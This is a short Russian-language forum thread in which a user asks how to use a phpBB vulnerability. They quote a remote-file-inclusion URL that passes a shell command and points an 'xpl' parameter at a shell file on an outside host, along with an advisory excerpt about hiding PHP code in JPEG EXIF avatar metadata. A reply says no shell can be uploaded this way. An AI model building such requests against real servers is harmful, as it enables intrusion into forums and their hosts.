http://www.securitylab.ru/vulnerability/source/267550.php тут полное описание бага (на англиском)


Вопрос:

http://some_vulnerable.host/somescript.php?cmd=ls%20-la&xpl=http://somehost/someshell.txt
http://some_vulnerable.host - это форум phpBB
http://somehost/someshell.txt -это шел
somescript.php?cmd=ls%20-la&xpl= - что это?

В чём разобрался сам:
(3) inject some php code inside jpeg files as EXIF metadata content:
this, in combinations with third party vulnerable code can be used
to compromise the server where PHP is installed.
Should be enough to check for php code inside the temporary files
before to copy the new avatar in "images/avatars/" folder
Решение тут:
http://www.php.net/image
http://www.zend.com/manual/ref.exif.php
http://us2.php.net/exif

Слушай очень надо решить этот вапрос! помогим как созтавить!

никакого шелла вы с помощью этой баги не зальете. даже с моими скудными познаниями в английском языке это понятно.

zoko
хорошо...тогда что даёт эта бага?
и как составить правильный запрос?